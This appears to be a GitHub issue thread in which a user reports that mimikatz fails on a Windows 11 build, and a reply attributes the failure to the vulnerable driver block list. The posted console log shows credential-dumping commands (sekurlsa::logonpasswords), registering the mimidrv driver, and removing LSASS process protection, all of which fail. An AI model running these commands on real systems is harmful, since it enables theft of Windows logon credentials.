Windows 11 Build 10.0.22621.1848
GjBrutello opened this issue · 2 comments
Hello! In the last Windows build I get error:
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list
Also trying to unlock lsass:
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
ERROR kull_m_service_install ; StartService (0x800b010c)
mimikatz(commandline) # !processprotect /remove /process:LSASS.EXE
Process : LSASS.EXE
PID 1232 -> 00/00 [0-0-0]
ERROR kull_m_kernel_ioctl ; CreateFile (0x00000002)
mimikatz(commandline) # exit
Bye!
It seems the new Windows 11 does not allow to create a service without a digital signature.
Windows 11 Build 10.0.22621.1848
Mimikatz 2.2.0 20220919 Djoin parser & Citrix SSO Extractor, Sep 19, 2022. Tried other versions but the same result.
Your error when installing the service resolves to CERT_E_REVOKED
. This is likely due to the vulnerable driver block list.